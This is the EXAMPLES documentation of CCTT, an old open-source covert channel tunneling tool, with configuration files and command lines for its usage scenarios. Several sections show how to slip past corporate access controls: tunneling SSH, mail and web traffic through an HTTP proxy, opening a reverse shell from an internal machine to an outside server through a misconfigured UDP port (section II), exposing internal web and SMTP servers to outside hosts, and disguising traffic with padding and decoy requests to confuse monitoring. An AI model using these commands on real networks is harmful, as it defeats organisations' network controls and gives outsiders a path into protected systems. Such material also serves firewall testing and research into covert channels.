CCTT - Covert Channel Tunneling Tool v0.1.8 - EXAMPLES
Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
$Id: EXAMPLES,v 1.15 2003/08/31 10:34:21 simsim Exp $

================================================================================
This file is part of CCTT - Covert  Channel  Tunneling  Tool  v0.1.8  (C)  Simon
Castro.
CCTT is free software; you can redistribute it and/or modify it under the  terms
of the GNU General Public License as published by the Free Software  Foundation;
either version 2 of the License, or (at your option) any later version.
CCTT is distributed in the  hope  that  it  will  be  useful,  but  WITHOUT  ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS  FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General  Public  License  along  with
CCTT; if not, write to the Free Software  Foundation,  Inc.,  59  Temple  Place,
Suite 330, Boston, MA  02111-1307  USA
================================================================================

  Considering your local network (and access control system) scheme connected to
the Internet and the CCTT functionalities you want, here are a few  examples  of
client/server configuration files and command line parameters you should use.

   I) Pass through an HTTP Proxy  network  scheme  to  access  several  external
      services
  II) Pass through a network scheme having UDP 'holes'. 
 III) Use HTTP Login/Password credentials on an external Website with CCTT
  IV) Use the CCTT client only to get the Proxy Chain functionality
   V) Reverse proxy mode concept demonstration with CCTT
  VI) HTTP  Mode  :  Creating  confusion  sending / receiving  unnecessary  HTTP
      messages
 VII) HTTP Mode : Creating confusion customizing how the server looks like
VIII) HTTP Mode : Creating confusion adding padding to channel datas

================================================================================

I) Pass through an HTTP Proxy network scheme to access several external services

  A] Local network scheme

  An usual local network scheme may have one way out : The HTTP Proxy... but  it
  often allows connections to remote Web  servers  on  TCP  port  443  with  the
  CONNECT method. 
  We assume that we know the proxy IP address : 192.168.1.1  and  its  listening
  port : 8080.

  B] CCTT functionalities

     We want, from the local network :
    * SSH access to our personal box connected to the Internet (111.222.1.1).
    * SMTP access to our personal ISP smtp server (111.222.2.1).
    * POP access to our personal ISP pop server (111.222.2.2).

  C] Configuration files

  Our personal box configuration must be : 
       * SSH server listening on the loopback.
       * Firewall allows In/Out to our ISP smtp and pop servers.
       * A restricted user (without shell, no rights) whose name is cctt.
       * A chroot directory : jail.
    * And finally, we must have superuser access to execute  the  CCTT  server
      part.
       
  The  server  configuration  file  (srv_example_1.cf)  must   look   like   the
  following :
       PROTOCOL=tcp
       IDENT=basic_ident
       IDENT_KEY=simsim
       SRV_SHELL_LOC=/usr/local/bin/false
       SRV_SHELL_CMD=false
       PROXY_MODE_LIST=ssh:127.0.0.1:22
       PROXY_MODE_LIST=smtp:111.222.2.1:25
       PROXY_MODE_LIST=pop:111.222.2.2:110
       PROXY_ONLY=ON
       PERM_USER_GROUP=cctt
       PERM_CHROOT=cage
  
     The client configuration files must look like the following :
     
    cl_example_1_ssh.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4222
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=127.0.0.1
        PROXY_MODE_REMOTE_PORT=22

    cl_example_1_smtp.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4225
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.1
        PROXY_MODE_REMOTE_PORT=25

    cl_example_1_pop.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=42110
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.2
        PROXY_MODE_REMOTE_PORT=110

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 443 -f srv_example_1.cf -t socket_encode -L -v &

    To run the client parts, we use (no root account) : 
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_ssh.cf \
      -t socket_http_proxy_encode -a &
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_smtp.cf \
      -t socket_http_proxy_encode -a &
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_pop.cf \
      -t socket_http_proxy_encode -a &

  We now have 3 TCP ports listening on the box loopback located on the  internal
  network :
    * the 4222 port allows us to reach our Internet personal box using  the  SSH
      protocol.
      * the 4225 port allows us to reach our ISP Smtp external server.
      * the 42110 port allows us to reach our ISP Pop external server.

  The CCTT server is running  on  our  Internet  personal  box  with  restricted
  privileges, jailed in the 'cage' directory and is sending verbose messages  to
  the local Syslogd.

================================================================================

II) Pass through a network scheme having UDP 'holes'.

  A] Local network scheme

  The network scheme we want to pass through is  built  with  a  network  access
  control system badly configured and we know that it is possible to reach, from
  a box of the internal network, an Internet remote server listening on the 7272
  UDP port.

  B] CCTT functionalities

  We  want  to  initiate  an  UDP  connection  to  the  Internet  remote  server
  (111.222.1.1:7272) and bind a reverse-shell to it so that we'll have an access
  to the internal network from the outside box.

  C] Configuration files

  Our personal box configuration must be : 
      * Firewall allows In/Out UDP datagrams on the 7272 port.
      * A restricted user (without shell, no rights) whose name is cctt.
      * A chroot directory : jail.
    * And finally, we must have superuser access  to  execute  the  CCTT  server
      part.

  The  server  configuration  file  (srv_example_2.cf)  must   look   like   the
  following :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/bin/false
      SRV_SHELL_CMD=false
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

  The client configuration file (cl_example_2.cf) must look like the following :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 7272 -f srv_example_2.cf -t socket_encode -l &

    To run the client part, we use (no root account) : 
    cctt -c 111.222.1.1 -d 7272 -f cl_example_2.cf -t socket_encode -r &
           
  Using the server's interactive mode, we now have  access,  from  our  Internet
  located box, to the internal protected network.
  NB : The shell session is saved in a log file.

================================================================================

III) Use HTTP Login/Password credentials on an external Website with CCTT

  A] Local network scheme

  The network scheme in this example is similar to the I) one, but  any  network
  scheme would have be convenient. We are specially focusing this example on the
  desired functionality.
  We know the HTTP proxy's IP address : 192.168.1.1 and  its  listening  port  :
  8080. We also know that it is possible to use the CONNECT method.

  B] CCTT functionalities

  We have to enter login/password on an Internet Website from our box located on
  the internal network.
  The problem is : 'the remote Web server doesn't have SSL enabled' and we don't
  want the network administrators to look at our credentials on the wire.

  C] Configuration files

  Our personal box configuration must be : 
      * Firewall allows In/Out Tcp access to the remote Web server.
      * A restricted user (without shell, no rights) whose name is cctt.
      * A chroot directory : jail.
    * And finally, we must have superuser access  to  execute  the  CCTT  server
      part.

  The server configuration file (srv_example_3.cf) must look like the following:
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_MODE_LIST=http:111.222.7.7:80
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

  The client configuration file (cl_example_3.cf) must look like the following :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=30000
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=111.222.7.7
      PROXY_MODE_REMOTE_PORT=80

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 443 -f srv_example_3.cf -t socket_encode -L -v &

    To run the client part, we use (no root account) : 
    cctt -c 111.222.1.1 -d 443 -f cl_example_3.cf \
      -t socket_http_proxy_encode -a &

  We now configure our browser to use 127.0.0.1:4280 as the http proxy  and  our
  HTTP requests to the remote Web server (including its vhosts on  the  same  IP
  address) will be sent through the 'encoded' CCTT channel. 

================================================================================

 IV) Use the CCTT client only to get the Proxy Chain functionality

  A] Local network scheme

  Another example with the I) network scheme but we will  stress  out  the  idea
  again.
  We know the IP address and the listening port of our HTTP proxy located on the
  internal network (192.168.1.1:8080).
  We know the IP addresses of two Internet HTTP  proxies  allowing  the  CONNECT
  HTTP method (111.111.1.1:8080 and 222.222.2.2:8080).
  We know that theses 3 proxies allow connections to the 443 and 8080 remote TCP
  ports.

  B] CCTT functionalities

  We want SSH access to our Internet located personal box (111.222.1.1:443).
  We have an SSHd server listening on this port and we think : 'NO MORE  INSTALL
  OF ANY PROG ON OUR BOX' :)

  C] Configuration files

  The client configuration file (cl_example_4.cf) must look like the following :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=25000
      HTTP_PROXY_CHAIN=111.111.1.1:8080:25000;222.222.2.2:8080:25000
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4222
      PROXY_MODE_PROT=tcp
      ### These ones are not used, but without them, the client won't start.
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_REMOTE_IP=127.0.0.1
      PROXY_MODE_REMOTE_PORT=22

  D] Command line parameters to run CCTT 

    To run the CCTT client (no root account), we use :
    cctt -c 111.222.1.1 -d 443 -f cl_example_4.cf \
      -t client_only_with_http_proxy &

    We now have the CCTT client listening on localhost:4222.
  When this client gets a TCP connection, it initiates a connection to the first
  HTTP proxy, then to the second and the third, and reach our SSHd server.
  At this time, we  have  a  TCP  channel  between  the  local  and  the  remote
  applications.

================================================================================

V) Reverse proxy mode concept demonstration with CCTT.

  A] Local network scheme

  The network scheme in this example is similar to the I) one, but  any  network
  scheme would have be convenient. We are specially focusing this example on the
  desired functionality.
  We know the HTTP proxy's IP address : 192.168.1.1 and  its  listening  port  :
  8080. We also know that it is possible to use the CONNECT method.

  B] CCTT functionalities

  We want a remote access to the internal located  Web  server  (192.168.2.1:80)
  and to the internal located SMTP server  (192.168.2.2:25)  from  the  external
  network.
  We will allow two remote external located stations (W1 and W2) to  connect  to
  the Web server and a third one (S) to connect to the  SMTP  server  using  our
  CCTT server located on an external located station (C - 111.222.1.1:443).

  C] Configuration files

  The  server  configuration  file  (srv_example_5.cf)  must   look   like   the
  following :
        PROTOCOL=tcp
        IDENT=basic_ident
        IDENT_KEY=simsim
        SRV_SHELL_LOC=/usr/local/bin/false
        SRV_SHELL_CMD=false
        PROXY_ONLY=ON
        PERM_USER_GROUP=cctt
        PERM_CHROOT=cage

  The internal located client  configuration  file  (cl_Wint_example_5.cf)  must
  look like the following to allow access to the Web server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	CHANNEL_PROXY_IP=192.168.1.1
	CHANNEL_PROXY_PORT=8080
	CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=15000
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.1
	PROXY_MODE_REMOTE_PORT=80

  The internal located client  configuration  file  (cl_Sint_example_5.cf)  must
  look like the following to allow access to the SMTP server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	CHANNEL_PROXY_IP=192.168.1.1
	CHANNEL_PROXY_PORT=8080
	CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=15000
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.2
	PROXY_MODE_REMOTE_PORT=25

  The external located client  configuration  file  (cl_Wext_example_5.cf)  must
  look like the following to allow access to the Web server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	PROXY_MODE_LOCAL_IP=@IP_W1
	PROXY_MODE_LOCAL_PORT=4280
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.1
	PROXY_MODE_REMOTE_PORT=80

  The external located client  configuration  file  (cl_Sext_example_5.cf)  must
  look like the following to allow access to the SMTP server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	PROXY_MODE_LOCAL_IP=@IP_S
	PROXY_MODE_LOCAL_PORT=4225
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.2
	PROXY_MODE_REMOTE_PORT=25

  D] Command line parameters to run CCTT 

     We first run the server (as root) using : 
     cctt -s 111.222.1.1 -p 443 -f srv_example_5.cf -t socket -L -v &

     We then run the two internal located CCTT clients in reverse proxy mode :
    cctt -c 111.222.1.1 -d 443 -f cl_Wint_example_5.cf -t socket_http_proxy -z &
    cctt -c 111.222.1.1 -d 443 -f cl_Sint_example_5.cf -t socket_http_proxy -z &

  => These two internal located CCTT  client  record  themselve  into  the  CCTT
     server - configuring it to use them as proxy to access  the  Web  and  SMTP
     servers - and keep the connection up.

  NB : The CCTT server dynamically add and remove the reverse  proxy  mode  CCTT
  clients when they establish or drop a connection.

     We run the two external located CCTT clients in proxy mode :
    On W1, we run : cctt -c 111.222.1.1 -d 443 -f cl_Wext_example_5.cf \
      -t socket -a &
    On S, we run  : cctt -c 111.222.1.1 -d 443 -f cl_Sext_example_5.cf \
      -t socket -a &

     => These two clients are now waiting for application connections.

  We now have two daemons listening : One allows connections to the  Web  server
  and is listening on @IP_W1:4280, the second one is listening on @IP_S:4225 and
  allows connections to the SMTP server.

     When an applicative client wants a channel to the SMTP server :
      * It opens a connection to @IP_S:4225.
    * The S CCTT client opens a connection to the C CCTT server and  asks  it  a
      channel to the SMTP server.
    * The CCTT server checks in its proxy list, finds the reverse connection  to
      the internal located CCTT client and acts as a proxy on this connection.
    * The internal located CCTT client receives datas, opens a connection to the
      SMTP server and acts as a proxy.

  And when other SMTP or Web applicative clients want  to  access  the  internal
  located resources, it is the same.

================================================================================

VI) HTTP Mode : Creating confusion sending/receiving unnecessary HTTP messages.

   Configuration file examples are in doc/confs/http_post1.
   Refer to previous examples for the command line parameters.

  A] Local network scheme
    
  Any local network scheme allowing a local user to send HTTP POST  requests  to
  the outside world with or without using an intermediary HTTP proxy.

  B] Presented functionalities

  The CCTT HTTP mode allow sending unnecessary HTTP POST request messages beside
  the data channel necessary ones.
  These HTTP POST messages are sent by the CCTT client  at  regulary  or  random
  intervals to the CCTT server and don't carry any communication channel data.
  If these HTTP POST messages are set into the server  configuration,  the  CCTT
  server sends the related files content and this content is  discarded  by  the
  CCTT client.

  The data stream generated may thus  increase  the  confusion  of  an  eventual
  observer.

================================================================================

VII) HTTP Mode : Creating confusion customizing how the server looks like.

   Configuration file examples are in doc/confs/http_post1.
   Refer to previous examples for the command line parameters.

  A] Local network scheme
    
  Any local network scheme allowing a local  user  to  send  HTTP  POST  request
  message to the outside world with or without using an intermediary HTTP proxy.

  B] Presented functionalities

  If the CCTT server is configured as in the VI example, it can accept  incoming
  (HTTP or not) request messages from non-CCTT clients.
  If  these  HTTP  request  messages  are  set  into  the  server  configuration
  (GET /index.html HTTP/1.0 for example), the server sends back the file content
  and if they are not configured, the server sends back an error page.
    Examples of such pages are available on the HTML presentation located on the
  Gray-World website.

================================================================================

VIII) HTTP Mode : Creating confusion adding padding to channel datas.

   Configuration file examples are in doc/confs/http_post2.
   Refer to previous examples for the command line parameters.

  A] Local network scheme
    
  Any local network scheme allowing a  local  user  to  send  HTTP  POST request
  messages to the outside world with  or  without  using  an  intermediary  HTTP
  proxy.

  B] Presented functionalities

  The HTTP mode of CCTT allows padding data at the top or at the bottom  of  the
  communication channel datas.
  This padding can be added to the HTTP POST request messages of the  client  or
  to the HTTP response message of the server.

  A padding example of an HTTP communication between a client and  a  server  is
  presented in the doc/confs/http_post2/snort_capture.txt file.

================================================================================
